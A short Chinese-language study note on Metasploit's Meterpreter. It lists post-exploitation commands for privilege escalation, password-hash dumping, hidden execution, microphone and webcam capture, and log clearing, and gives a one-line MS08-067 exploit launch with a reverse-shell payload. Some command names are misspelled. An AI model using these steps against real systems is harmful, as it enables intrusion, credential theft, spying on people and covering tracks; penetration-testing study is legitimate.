msf学习笔记（3）

meterpreter

高级、动态、可扩展的Payload

基础命令

help
background
cd
dir /   ls
cat
mkdir
rmdir
mv
rm 
edit    #编辑目标文件
lpwd    #显示本地目录
lcd     #进入本地目录
download    #下载到lpwd目录
upload  #上传
execute -f cmd.exe -i -H #执行程序
           

进阶命令

run     #调用大量模块进行控制（前台）
bgrun   #调用大量模块进行控制（后台）
download    #下载到lpwd目录
upload  #上传
execute -f cmd.exe -i -H #执行程序，-f指定文件，-i交互，-H隐藏
geiuid  #查看账号
getsystem   #强制获取system权限
getprive    #查看权限
getproxy    #获取代理信息
getpid  #查看自身进程pid
migrate #迁移进程
hashdump    #获取hashdump
sysinfo #获取系统信息
ps  #获取进程信息
kill    #kil进程
show_mount  #查看分区信息
reboot  #重启
shutdown    #关机
shell   #获取操作系统shell
search -f   #搜索文件
arp #查看arp信息
netstat #查看网络连接情况
ipconfig    \   ifconfig    #查看IP地址
route   #路由表
idletime    #目标操作系统空闲时间
resource    #调用资源文件
record_mic  #mic录音
webcam_list #列出摄像头
webcam_snap -i  -v false   #每隔1秒拍照
load python #扩展python
clearev #清除日志！！！重要
           

msfcli

2015年6月已经取消

示例

msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST ; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ; set LPORT ; set target ;exploit"